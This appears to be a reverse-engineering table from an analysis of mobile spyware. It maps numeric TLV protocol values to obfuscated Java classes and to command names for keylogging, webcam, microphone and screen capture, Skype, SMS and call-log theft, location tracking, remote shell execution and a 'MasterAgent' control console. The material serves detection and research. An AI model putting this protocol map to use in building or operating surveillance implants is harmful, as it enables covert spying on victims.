2602,,5330592,×,unknown,Lorg/xmlpush/v3/o/e
2602,,5329568,×,unknown,Lorg/xmlpush/v3/o/e
2602,,5330080,×,unknown,Lorg/xmlpush/v3/o/e
2596,,5317536,×,unknown,Lorg/xmlpush/v3/o/e
2596,,5317792,×,unknown,Lorg/xmlpush/v3/o/e
2596,,5318048,×,unknown,Lorg/xmlpush/v3/o/e
2596,,5317280,×,unknown,Lorg/xmlpush/v3/o/e
2594,,5313440,×,unknown,Lorg/xmlpush/v3/o/e
2594,,5312928,×,unknown,Lorg/xmlpush/v3/o/e
2594,,5313184,×,unknown,Lorg/xmlpush/v3/o/e
2600,,5325216,×,unknown,Lorg/xmlpush/v3/o/e
2598,,5321376,×,unknown,Lorg/xmlpush/v3/o/e
2598,,5322144,×,unknown,Lorg/xmlpush/v3/o/e
2784,mode location custom config,5703584,×,unknown,Lorg/xmlpush/v3/o/n
2784,mode location custom config,5703328,×,unknown,Lorg/xmlpush/v3/o/n
2784,mode location custom config,5702816,×,unknown,Lorg/xmlpush/v3/o/n
2784,interface network,5702032,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2784,interface network,5702304,×,unknown,Lorg/xmlpush/v3/h/c
2785,interface network,5703808,×,unknown,Lorg/xmlpush/v3/o/n
2785,interface network,5704064,×,unknown,Lorg/xmlpush/v3/o/n
1757,interface network,3600000,×,unknown,Lorg/xmlpush/v3/b/f
2696,interface network,5521552,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2696,interface network,5521568,×,unknown,Lorg/xmlpush/v3/h/c
2720,,5570960,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2720,,5571232,×,unknown,Lorg/xmlpush/v3/h/c
2756,,5644432,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2756,,5644704,×,unknown,Lorg/xmlpush/v3/h/c
2848,,5833104,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2848,,5833376,×,unknown,Lorg/xmlpush/v3/h/c
3104,,6357392,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
3104,,6357664,×,unknown,Lorg/xmlpush/v3/h/c
2664,,5456016,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
2664,,5456288,×,unknown,Lorg/xmlpush/v3/h/c
4243,,8690064,×,unknown,"Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c"
4243,,8690336,×,unknown,Lorg/xmlpush/v3/h/c
4243,,8689712,×,unknown,"Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c"
2304,,4719008,×,unknown,Lorg/xmlpush/v3/d/a
2304,,4719232,×,unknown,Lorg/xmlpush/v3/d/a
3106,,6361200,×,unknown,Lorg/xmlpush/v3/k/c
16425,,33639248,×,unknown,Lorg/xmlpush/v3/h/a
48781,,99903492,×,unknown,"Lorg/b/b/e$gs, L/org/b/b/e$r"
41609,,85215461,×,unknown,"Lorg/b/b/e$df, L/org/b/b/e$j"
4494,,9203775,×,unknown,"Lorg/b/b/e$ol, L/org/b/b/e$pi"
25586,,52401552,×,unknown,"Lorg/b/b/e$js, L/org/b/b/e$x"
21214,,43446532,×,unknown,"Lorg/b/b/e$ec, L/org/b/b/e$m"
27793,,56920439,×,unknown,"Lorg/b/b/e$az, L/org/b/b/e$d"
26992,,55281185,×,unknown,"Lorg/b/b/e$nj, L/org/b/b/e$ag"
44308,,90744648,×,unknown,"Lorg/b/b/e$ew, L/org/b/b/e$ev"
1 Group ID Group name TLV value Known TLV TLV name Function
2 64 drives all get 131488 TlvTypeGetAllDrivesRequest
3 64 drives all get 131744 TlvTypeGetAllDrivesReply
4 66 contents folder get 135328 TlvTypeGetFolderContentsRequest
5 66 contents folder get 135584 TlvTypeGetFolderContentsReply
6 66 contents folder get 135840 TlvTypeGetFolderContentsNext
7 66 contents folder get 136096 TlvTypeGetFolderContentsEnd
8 68 download file 139424 TlvTypeDownloadFileRequest
9 68 download file 139680 TlvTypeCancelDownloadFileRequest
10 68 download file 139936 TlvTypeDownloadFileReply
11 68 download file 140192 TlvTypeDownloadFileNext
12 68 download file 140448 TlvTypeDownloadFileEnd
13 68 download file 140704 TlvTypeCancelDownloadFileReply
14 70 upload file 143520 TlvTypeUploadFileRequest
15 70 upload file 143776 TlvTypeCancelUploadFileRequest
16 70 upload file 144032 TlvTypeUploadFileReply
17 70 upload file 144288 TlvTypeUploadFileNext
18 70 upload file 144544 TlvTypeUploadFileEnd
19 70 upload file 144800 TlvTypeUploadFileCompleted
20 70 upload file 145056 TlvTypeCancelUploadFileReply
21 72 delete file 147616 TlvTypeDeleteFileRequest
22 72 delete file 147872 TlvTypeDeleteFileReply
23 74 search file 151968 TlvTypeSearchFileRequest
24 74 search file 152224 TlvTypeSearchFileReply
25 74 search file 152480 TlvTypeSearchFileNext
26 74 search file 152736 TlvTypeSearchFileEnd
27 74 search file 152992 TlvTypeCancelSearchFileRequest
28 74 search file 153248 TlvTypeCancelSearchFileReply
29 78 fs 159888 TlvTypeFSFileDataChunk Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c
30 78 fs 160128 TlvTypeFSDiskDrive Lorg/xmlpush/v3/o/e
31 78 fs 160384 TlvTypeFSFullPath Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/f/b, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c
32 78 fs 160640 TlvTypeFSFilename Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, L/org/xmlpush/v3/h/c
33 78 fs 160896 TlvTypeFSFileExtension
34 78 fs 161088 TlvTypeFSDiskDriveType Lorg/xmlpush/v3/o/e
35 78 fs 161408 TlvTypeFSFileSize Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
36 78 fs 161584 TlvTypeFSIsFolder Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
37 79 fs 161840 TlvTypeFSReadOnly Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
38 79 fs 162096 TlvTypeFSHidden Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
39 79 fs 162352 TlvTypeFSSystem Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
40 79 fs 162688 TlvTypeFSFileCreationTime Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
41 79 fs 162944 TlvTypeFSFileLastAccessTime Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
42 79 fs 163200 TlvTypeFSFileLastWriteTime Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e, Lorg/xmlpush/v3/o/e
43 79 fs 163472 TlvTypeFSFullPathM Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, Lorg/xmlpush/v3/o/d, L/org/xmlpush/v3/h/c
44 79 fs 163632 × unknown Lorg/xmlpush/v3/o/e
45 82 system config file 168096 TlvTypeGetFileSystemConfigRequest
46 82 system config file 168352 TlvTypeFileSystemConfigReply
47 82 system config file 168608 TlvTypeSetFileSystemConfigRequest
48 128 line cmd 262560 TlvTypeStartCmdLineSessionRequest
49 128 line cmd 262816 TlvTypeStartCmdLineSessionReply
50 128 line cmd 263072 TlvTypeStopCmdLineSessionRequest
51 128 line cmd 263328 TlvTypeCmdLineSessionStoppedReply
52 128 line cmd 263584 TlvTypeCmdLineExecute
53 128 line cmd 263840 TlvTypeCmdLineExecutionResult
54 130 line cmd execute 266352 TlvTypeCmdLineExecuteCommand
55 130 line cmd execute 266560 TlvTypeCmdLineExecuteAnswerID
56 130 line cmd execute 266864 TlvTypeCmdLineExecuteAnswerData
57 146 line config cmd 299168 TlvTypeGetCmdLineConfigRequest
58 146 line config cmd 299424 TlvTypeCmdLineConfigReply
59 146 line config cmd 299680 TlvTypeSetCmdLineConfigRequest
60 160 config scheduler 328096 TlvTypeGetSchedulerConfigRequest
61 160 config scheduler 328352 TlvTypeSchedulerConfigReply
62 160 config scheduler 328608 TlvTypeSetSchedulerConfigRequest
63 162 task scheduler 331920 TlvTypeSchedulerTask
64 162 task scheduler 332192 TlvTypeSchedulerTaskRecordByTime
65 162 task scheduler 332448 TlvTypeSchedulerTaskRecordScreenWhenAppRuns
66 162 task scheduler 332704 TlvTypeSchedulerTaskRecordMicWhenAppUsesIt
67 162 task scheduler 332960 TlvTypeSchedulerTaskRecordWebCamWhenAppUsesIt
68 176 sch 360592 TlvTypeSCHTaskConfiguration L/org/xmlpush/v3/h/c
69 176 sch 360752 TlvTypeSCHTaskEnabled L/org/xmlpush/v3/h/c
70 176 sch 361344 TlvTypeSCHTaskStartDateTime L/org/xmlpush/v3/h/c
71 176 sch 361600 TlvTypeSCHTaskStopDateTime L/org/xmlpush/v3/h/c
72 176 sch 362112 TlvTypeSCHApplicationName
73 176 sch 362288 TlvTypeSCHApplicationWindowOnly
74 512 microphone 1048992 TlvTypeStartMicrophoneRequest
75 512 microphone 1049248 TlvTypeStartMicrophoneReply
76 512 microphone 1049504 TlvTypeMicrophoneFrame
77 512 microphone 1049760 TlvTypeStopMicrophoneRequest
78 512 microphone 1050016 TlvTypeMicrophoneStoppedReply
79 512 microphone 1050272 TlvTypeStartMicrophoneRecording
80 514 1052736 TlvTypeMICFrameID Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n
81 514 1053072 TlvTypeMICFrameData Lorg/xmlpush/v3/o/a, Lorg/xmlpush/v3/o/n
82 514 1053312 TlvTypeAudioSessionType
83 514 1053568 TlvTypeAudioEncodingType
84 518 audio config 1061024 TlvTypeGetAudioConfigRequest
85 518 audio config 1061280 TlvTypeAudioConfigReply
86 518 audio config 1061536 TlvTypeSetAudioConfigRequest
87 520 type video 1066112 TlvTypeVideoSessionType Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b
88 520 type video 1066368 TlvTypeVideoEncodingType Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b
89 544 screen 1114528 TlvTypeStartScreenRequest
90 544 screen 1114784 TlvTypeStartScreenReply
91 544 screen 1115040 TlvTypeScreenFrame
92 544 screen 1115296 TlvTypeStopScreenRequest
93 544 screen 1115552 TlvTypeScreenStoppedReply
94 544 screen 1115808 TlvTypeStartScreenRecording
95 548 cam web 1122720 TlvTypeStartWebCamRequest
96 548 cam web 1122976 TlvTypeStartWebCamReply
97 548 cam web 1123232 TlvTypeWebCamFrame
98 548 cam web 1123488 TlvTypeStopWebCamRequest
99 548 cam web 1123744 TlvTypeWebCamStoppedReply
100 548 cam web 1124000 TlvTypeStartWebCamRecording
101 550 config video 1126560 TlvTypeGetVideoConfigRequest
102 550 config video 1126816 TlvTypeVideoConfigReply
103 550 config video 1127072 TlvTypeSetVideoConfigRequest
104 552 1130560 TlvTypeVDFrameID Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b
105 552 1130896 TlvTypeVDFrameData Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b
106 552 1131136 TlvTypeOriginalVideoResolution Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b
107 552 1131392 TlvTypeVideoResolution Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/k, Lorg/xmlpush/v3/o/b, Lorg/xmlpush/v3/o/b
108 552 1132160 TlvTypeAutomaticRecordingUID
109 576 key logging 1180064 TlvTypeStartKeyLoggingRequest
110 576 key logging 1180320 TlvTypeStartKeyLoggingReply
111 576 key logging 1180576 TlvTypeKeyLoggingFrame
112 576 key logging 1180832 TlvTypeStopKeyLoggingRequest
113 576 key logging 1181088 TlvTypeKeyLoggingStoppedReply
114 582 config keylogger 1192096 TlvTypeGetKeyloggerConfigRequest
115 582 config keylogger 1192352 TlvTypeKeyloggerConfigReply
116 582 config keylogger 1192608 TlvTypeSetKeyloggerConfigRequest
117 584 kl frame data 1196416 TlvTypeKLFrameData Lorg/xmlpush/v3/o/i
118 640 skype 1311136 TlvTypeSkypeAudioMetaInfo
119 640 skype 1311376 TlvTypeSkypeAudioRecording
120 640 skype 1311648 TlvTypeSkypeTextRecording
121 640 skype 1311904 TlvTypeSkypeFileMetaInfo
122 640 skype 1312144 TlvTypeSkypeFileRecording
123 640 skype 1312416 TlvTypeSkypeContactsRecording
124 640 skype 1312640 TlvTypeSkypeContactsUserData
125 646 config skype 1323168 TlvTypeGetSkypeConfigRequest
126 646 config skype 1323424 TlvTypeSkypeConfigReply
127 646 config skype 1323680 TlvTypeSetSkypeConfigRequest
128 646 config skype 1324336 TlvTypeConfigSkypeAudioEnable
129 646 config skype 1324592 TlvTypeConfigSkypeTextEnable
130 646 config skype 1324848 TlvTypeConfigSkypeFileEnable
131 647 config contacts enable list skype 1325104 TlvTypeConfigSkypeContactsListEnable
132 648 skype 1327232 TlvTypeSkypeAudioEncodingType
133 648 skype 1327488 TlvTypeSkypeLoggedInUserAccountName
134 648 skype 1327744 TlvTypeSkypeConversationPartnerAccountName
135 648 skype 1328000 TlvTypeSkypeConversationPartnerDisplayName
136 648 skype 1328256 TlvTypeSkypeChatMembers
137 648 skype 1328512 TlvTypeSkypeTextMessage
138 648 skype 1328768 TlvTypeSkypeChatID
139 648 skype 1329024 TlvTypeSkypeSenderAccountName
140 649 skype 1329280 TlvTypeSkypeSenderDisplayName
141 649 skype 1329536 TlvTypeSkypeIncoming
142 649 skype 1329792 TlvTypeSkypeSessionType
143 704 changed file 1442208 TlvTypeChangedFileMetaInfo
144 704 changed file 1442432 TlvTypeChangedFileChangeTime
145 704 changed file 1442688 TlvTypeChangedFileChangeEvent
146 704 changed file 1442960 TlvTypeChangedFileRecording
147 710 config changed 1454240 TlvTypeGetChangedConfigRequest
148 710 config changed 1454496 TlvTypeChangedConfigReply
149 710 config changed 1454752 TlvTypeSetChangedConfigRequest
150 710 config changed 1454912 TlvTypeConfigChangedEvents
151 736 1507744 TlvTypeAccessedFileMetaInfo
152 736 1507968 TlvTypeAccessedFileAccessTime
153 736 1508224 TlvTypeAccessedFileAccessEvent
154 736 1508496 TlvTypeAccessedFileRecording
155 736 1508736 TlvTypeAccessedApplicationName
156 736 1508912 TlvTypeConfigRecordImagesFromExplorer
157 742 accessed config 1519776 TlvTypeGetAccessedConfigRequest
158 742 accessed config 1520032 TlvTypeAccessedConfigReply
159 742 accessed config 1520288 TlvTypeSetAccessedConfigRequest
160 742 accessed config 1520448 TlvTypeConfigAccessedEvents
161 768 print 1573280 TlvTypePrintFileMetaInfo
162 768 print 1573520 TlvTypePrintFrame
163 772 print 1581184 TlvTypePrintApplicationName
164 772 print 1581440 TlvTypePrintFilename
165 772 print 1581696 TlvTypePrintEncodingType
166 774 print config 1585312 TlvTypeGetPrintConfigRequest
167 774 print config 1585568 TlvTypePrintConfigReply
168 774 print config 1585824 TlvTypeSetPrintConfigRequest
169 800 deleted 1638816 TlvTypeDeletedFileMetaInfo
170 800 deleted 1639296 TlvTypeDeletedFileDeletionTime
171 800 deleted 1639552 TlvTypeDeletedFileRecycleBin
172 800 deleted 1639808 TlvTypeDeletedMethod
173 800 deleted 1640064 TlvTypeDeletedApplicationName
174 800 deleted 1640336 TlvTypeDeletedFileRecording
175 806 config deleted 1650848 TlvTypeGetDeletedConfigRequest
176 806 config deleted 1651104 TlvTypeDeletedConfigReply
177 806 config deleted 1651360 TlvTypeSetDeletedConfigRequest
178 1024 application upload forensics 2097568 TlvTypeUploadForensicsApplicationRequest
179 1024 application upload forensics 2097824 TlvTypeUploadForensicsApplicationReply
180 1024 application upload forensics 2098080 TlvTypeUploadForensicsApplicationChunk
181 1024 application upload forensics 2098336 TlvTypeUploadForensicsApplicationDoneRequest
182 1024 application upload forensics 2098592 TlvTypeUploadForensicsApplicationDoneReply
183 1026 application remove forensics 2101664 TlvTypeRemoveForensicsApplicationRequest
184 1026 application remove forensics 2101920 TlvTypeRemoveForensicsApplicationReply
185 1028 app forensics execute 2105760 TlvTypeForensicsAppExecuteRequest
186 1028 app forensics execute 2106016 TlvTypeForensicsAppExecuteReply
187 1028 app forensics execute 2106272 TlvTypeForensicsAppExecuteResult
188 1028 app forensics execute 2106528 TlvTypeForensicsAppExecuteResultChunk
189 1028 app forensics execute 2106784 TlvTypeForensicsAppExecuteResultDone
190 1028 app forensics execute 2107040 TlvTypeForensicsCancelAppExecuteRequest
191 1028 app forensics execute 2107296 TlvTypeForensicsCancelAppExecuteReply
192 1030 config forensics 2109600 TlvTypeGetForensicsConfigRequest
193 1030 config forensics 2109856 TlvTypeForensicsConfigReply
194 1030 config forensics 2110112 TlvTypeSetForensicsConfigRequest
195 1032 application config info forensics 2113680 TlvTypeConfigForensicsApplicationInfoGeneric
196 1032 application config info forensics 2113952 TlvTypeConfigForensicsApplicationInfo
197 1034 forensics 2117760 TlvTypeConfigForensicsApplicationName
198 1034 forensics 2117952 TlvTypeConfigForensicsApplicationSize
199 1034 forensics 2118208 TlvTypeConfigForensicsApplicationID
200 1034 forensics 2118528 TlvTypeConfigForensicsApplicationCmdline
201 1034 forensics 2118784 TlvTypeConfigForensicsApplicationOutput
202 1034 forensics 2118976 TlvTypeConfigForensicsApplicationTimeout
203 1034 forensics 2119232 TlvTypeConfigForensicsApplicationVersion
204 1034 forensics 2119552 TlvTypeForensicsFriendlyName
205 1035 output application config forensics 2119808 TlvTypeConfigForensicsApplicationOutputPrepend
206 1035 output application config forensics 2120064 TlvTypeConfigForensicsApplicationOutputContentType
207 1056 vo meta info ip 2163104 TlvTypeVoIPMetaInfo
208 1058 vo ip 2166912 TlvTypeVoIPEncodingType
209 1058 vo ip 2167168 TlvTypeVoIPSessionType
210 1058 vo ip 2167424 TlvTypeVoIPApplicationName Lorg/xmlpush/v3/o/n
211 1058 vo ip 2167696 TlvTypeVoIPAppScreenshot
212 1058 vo ip 2167952 TlvTypeVoIPAudioRecording
213 1058 vo ip 2168112 TlvTypeConfigVoIPScreenshotEnabled
214 1062 vo config ip 2175136 TlvTypeGetVoIPConfigRequest
215 1062 vo config ip 2175392 TlvTypeVoIPConfigReply
216 1062 vo config ip 2175648 TlvTypeSetVoIPConfigRequest
217 1088 clicks mouse 2228640 TlvTypeMouseClicksMetaInfo
218 1088 clicks mouse 2228896 TlvTypeMouseClicksFrame
219 1090 clicks mouse 2232448 TlvTypeMouseClicksEncodingType
220 1090 clicks mouse 2232896 TlvTypeConfigMouseClicksRectangle
221 1090 clicks mouse 2233152 TlvTypeConfigMouseClicksSensitivity
222 1090 clicks mouse 2233408 TlvTypeConfigMouseClicksType
223 1094 clicks config mouse 2240672 TlvTypeGetMouseClicksConfigRequest
224 1094 clicks config mouse 2240928 TlvTypeMouseClicksConfigReply
225 1094 clicks config mouse 2241184 TlvTypeSetMouseClicksConfigRequest
226 2112 sms 4325792 TlvTypeMobileSMSMetaInfo Lorg/xmlpush/v3/f/b
227 2112 sms 4326016 TlvTypeMobileSMSData Lorg/xmlpush/v3/f/b
228 2112 sms 4326256 TlvTypeSMSSenderNumber Lorg/xmlpush/v3/f/b
229 2112 sms 4326512 TlvTypeSMSRecipientNumber Lorg/xmlpush/v3/f/b
230 2112 sms 4326528 TlvTypeSMSInformation
231 2112 sms 4326768 TlvTypeSMSDirection Lorg/xmlpush/v3/f/b
232 2112 sms 4327040 × unknown Lorg/xmlpush/v3/f/b
233 2144 address book mobile 4391328 TlvTypeMobileAddressBookMetaInfo Lorg/xmlpush/v3/i/a
234 2144 address book mobile 4391552 TlvTypeMobileAddressBookData Lorg/xmlpush/v3/i/a
235 2152 address book checksum mobile 4407360 TlvTypeMobileAddressBookChecksum
236 2176 mobile blackberry 4456864 TlvTypeMobileBlackberryMessengerMetaInfo
237 2176 mobile blackberry 4457088 TlvTypeMobileBlackberryMessengerData
238 2176 mobile blackberry 4457328 TlvTypeMobileBlackberryMsChatID
239 2176 mobile blackberry 4457600 TlvTypeMobileBlackberryMsConversationPartners
240 2208 mobile tracking 4522400 TlvTypeMobileTrackingStartRequest
241 2208 mobile tracking 4522656 TlvTypeMobileTrackingStopRequest
242 2208 mobile tracking 4523376 TlvTypeMobileTrackingDataV10 Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e, Lorg/xmlpush/v3/t/e
243 2214 mobile config tracking 4535200 TlvTypeMobileTrackingConfig Lorg/xmlpush/v3/h/c
244 2214 mobile config tracking 4535440 TlvTypeMobileTrackingConfigRaw Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
245 2216 mobile tracking 4538432 TlvTypeMobileTrackingTimeInterval L/org/xmlpush/v3/h/c
246 2216 mobile tracking 4538688 TlvTypeMobileTrackingDistance L/org/xmlpush/v3/h/c
247 2216 mobile tracking 4538928 TlvTypeMobileTrackingSendOnAnyChannel L/org/xmlpush/v3/h/c
248 2240 mobile call phone 4587936 TlvTypeMobilePhoneCallLogsMetaInfo Lorg/xmlpush/v3/f/a
249 2240 mobile call phone 4588192 TlvTypeMobilePhoneCallLogsData Lorg/xmlpush/v3/f/b
250 2240 mobile call phone 4588400 TlvTypeMobilePhoneCallLogsType Lorg/xmlpush/v3/f/b
251 2240 mobile call phone 4588672 TlvTypeMobilePhoneCallAdditionalInformation Lorg/xmlpush/v3/f/b
252 2240 mobile call phone 4588912 TlvTypeMobilePhoneCallLogsCallerNumber Lorg/xmlpush/v3/f/b
253 2240 mobile call phone 4589168 TlvTypeMobilePhoneCallLogsCalleeNumber Lorg/xmlpush/v3/f/b
254 2240 mobile call phone 4589440 TlvTypeMobilePhoneCallLogsCallerName Lorg/xmlpush/v3/f/b
255 2241 name call phone logs mobile callee 4589696 TlvTypeMobilePhoneCallLogsCalleeName Lorg/xmlpush/v3/f/b
256 2242 last call phone entry mobile endtime log 4591680 TlvTypeMobilePhoneCallLogLastEntryEndtime
257 3072 mobile logging 6291872 TlvTypeMobileLoggingMetaInfo
258 3072 mobile logging 6292096 TlvTypeMobileLoggingData
259 3616 master agent 7405984 TlvTypeMasterAgentLogin
260 3616 master agent 7406240 TlvTypeMasterAgentLoginAnswer
261 3616 master agent 7406752 TlvTypeMasterAgentTargetList
262 3616 master agent 7407008 TlvTypeMasterAgentTargetOnlineList
263 3616 master agent 7407264 TlvTypeMasterAgentTargetInfoReply
264 3616 master agent 7407520 TlvTypeMasterAgentUserList
265 3617 master agent list 7407776 TlvTypeMasterAgentUserListReply
266 3617 master agent list 7408032 TlvTypeMasterAgentTargetArchivedList
267 3617 master agent list 7408288 TlvTypeMasterAgentTargetListEx
268 3617 master agent list 7408544 TlvTypeMasterAgentTargetOnlineListEx
269 3617 master agent list 7408800 TlvTypeMasterAgentMobileTargetArchivedList
270 3617 master agent list 7409056 TlvTypeMasterAgentMobileTargetList
271 3617 master agent list 7409312 TlvTypeMasterAgentMobileTargetOnlineList
272 3618 7409824 TlvTypeMasterAgentQueryFirst
273 3618 7410080 TlvTypeMasterAgentQueryNext
274 3618 7410336 TlvTypeMasterAgentQueryLast
275 3618 7410592 TlvTypeMasterAgentQueryAnswer
276 3618 7410848 TlvTypeMasterAgentRemoveRecord
277 3618 7411104 TlvTypeMasterAgentTargetInfoExReply
278 3618 7411344 TlvTypeTargetInfoExProperty
279 3618 7411616 TlvTypeTargetInfoExPropertyValue
280 3619 7411840 TlvTypeTargetInfoExPropertyValueName
281 3619 7411968 TlvTypeTargetInfoExPropertyValueData
282 3619 7412384 TlvTypeMasterAgentAlarm
283 3620 master agent 7413920 TlvTypeMasterAgentRetrieveData
284 3620 master agent 7414176 TlvTypeMasterAgentRetrieveDataAnswer
285 3620 master agent 7414432 TlvTypeMasterAgentRemoveUser
286 3620 master agent 7414688 TlvTypeMasterAgentRemoveTarget
287 3620 master agent 7414944 TlvTypeMasterAgentRetrieveDataComments
288 3620 master agent 7415200 TlvTypeMasterAgentUpdateDataComments
289 3620 master agent 7415712 TlvTypeMasterAgentRetrieveActivityLogging
290 3621 master agent 7415968 TlvTypeMasterAgentRetrieveMasterLogging
291 3621 master agent 7416224 TlvTypeMasterAgentRetrieveAgentActivityLogging
292 3621 master agent 7417248 TlvTypeMasterAgentSendUserGUIConfig
293 3621 master agent 7417504 TlvTypeMasterAgentGetUserGUIConfigRequest
294 3621 master agent 7417760 TlvTypeMasterAgentGetUserGUIConfigReply
295 3622 master agent 7418016 TlvTypeMasterAgentProxyList
296 3622 master agent 7418272 TlvTypeMasterAgentProxyInfoReply
297 3622 master agent 7419040 TlvTypeMasterAgentNameValuePacket
298 3622 master agent 7419248 TlvTypeMasterAgentValueName
299 3622 master agent 7419392 TlvTypeMasterAgentValueData
300 3622 master agent 7419808 TlvTypeMasterAgentRetrieveTargetHistory
301 3623 install master agent 7421088 TlvTypeMasterAgentInstallMasterLicense
302 3623 install master agent 7421344 TlvTypeMasterAgentInstallSoftwareUpdate
303 3623 install master agent 7421600 TlvTypeMasterAgentInstallSoftwareUpdateChunk
304 3623 install master agent 7421856 TlvTypeMasterAgentInstallSoftwareUpdateDone
305 3624 master agent 7422112 TlvTypeMasterAgentSoftwareUpdateInfo
306 3624 master agent 7422368 TlvTypeMasterAgentSoftwareUpdateInfoReply
307 3624 master agent 7422624 TlvTypeMasterAgentSoftwareUpdate
308 3624 master agent 7422880 TlvTypeMasterAgentSoftwareUpdateReply
309 3624 master agent 7423136 TlvTypeMasterAgentSoftwareUpdateNext
310 3624 master agent 7423392 TlvTypeMasterAgentAddTimeSchedule
311 3624 master agent 7423648 TlvTypeMasterAgentAddScreenSchedule
312 3624 master agent 7423904 TlvTypeMasterAgentAddLockedSchedule
313 3625 master agent 7424160 TlvTypeMasterAgentRemoveSchedule
314 3625 master agent 7424416 TlvTypeMasterAgentGetSchedulerList
315 3625 master agent 7424672 TlvTypeMasterAgentSchedulerTimeAction
316 3625 master agent 7424928 TlvTypeMasterAgentSchedulerScreenAction
317 3625 master agent 7425184 TlvTypeMasterAgentSchedulerLockedAction
318 3625 master agent 7425440 TlvTypeMasterAgentProjectSoftwareUpdateInfo
319 3625 master agent 7425696 TlvTypeMasterAgentProjectSoftwareUpdateInfoReply
320 3625 master agent 7425952 TlvTypeMasterAgentProjectSoftwareUpdate
321 3626 master agent 7426112 TlvTypeMasterAgentSchedulerID
322 3626 master agent 7426368 TlvTypeMasterAgentSchedulerStartTime L/org/xmlpush/v3/h/c
323 3626 master agent 7426624 TlvTypeMasterAgentSchedulerStopTime L/org/xmlpush/v3/h/c
324 3626 master agent 7427488 TlvTypeMasterAgentAddRecordedDataAvailableSchedule
325 3626 master agent 7427744 TlvTypeMasterAgentSchedulerRecordedDataAvailableAction
326 3627 master agent data 7428256 TlvTypeMasterAgentRetrieveRemoteMasterData
327 3627 master agent data 7428512 TlvTypeMasterAgentRetrieveRemoteMasterDataReply
328 3627 master agent data 7428768 TlvTypeMasterAgentDeleteRemoteMasterData
329 3627 master agent data 7429024 TlvTypeMasterAgentRetrieveOfflineMasterData
330 3627 master agent data 7429280 TlvTypeMasterAgentRetrieveOfflineMasterDataReply
331 3627 master agent data 7429536 TlvTypeMasterAgentDeleteOfflineMasterData
332 3628 master agent 7430304 TlvTypeMasterAgentQueryFirstEx
333 3628 master agent 7430560 TlvTypeMasterAgentQueryNextEx
334 3628 master agent 7430816 TlvTypeMasterAgentQueryLastEx
335 3628 master agent 7431072 TlvTypeMasterAgentQueryAnswerEx
336 3628 master agent 7431328 TlvTypeMasterAgentSendUserPreferences
337 3628 master agent 7431584 TlvTypeMasterAgentGetUserPreferencesRequest
338 3628 master agent 7431840 TlvTypeMasterAgentGetUserPreferencesReply
339 3628 master agent 7432096 TlvTypeMasterAgentListMCFilesRequest
340 3629 master agent mc 7432608 TlvTypeMasterAgentDeleteMCFiles
341 3629 master agent mc 7432864 TlvTypeMasterAgentSendMCFiles
342 3629 master agent mc 7433120 TlvTypeMasterAgentMCStatisticsRequest
343 3629 master agent mc 7433376 TlvTypeMasterAgentMCStatisticsReply
344 3629 master agent mc 7433616 TlvTypeMasterAgentMCStatisticsValues
345 3630 master agent 7434400 TlvTypeMasterAgentTrojanKeyRequest
346 3630 master agent 7434656 TlvTypeMasterAgentTrojanKeyReply
347 3630 master agent 7434912 TlvTypeMasterAgentEvProtectionX509Request
348 3630 master agent 7435168 TlvTypeMasterAgentEvProtectionX509Reply
349 3630 master agent 7435424 TlvTypeMasterAgentEvProtectionImportCert
350 3630 master agent 7435680 TlvTypeMasterAgentEvProtectionImportCertCompleted
351 3630 master agent 7435936 TlvTypeMasterAgentConfigurationRequest
352 3630 master agent 7436192 TlvTypeMasterAgentConfigurationReply
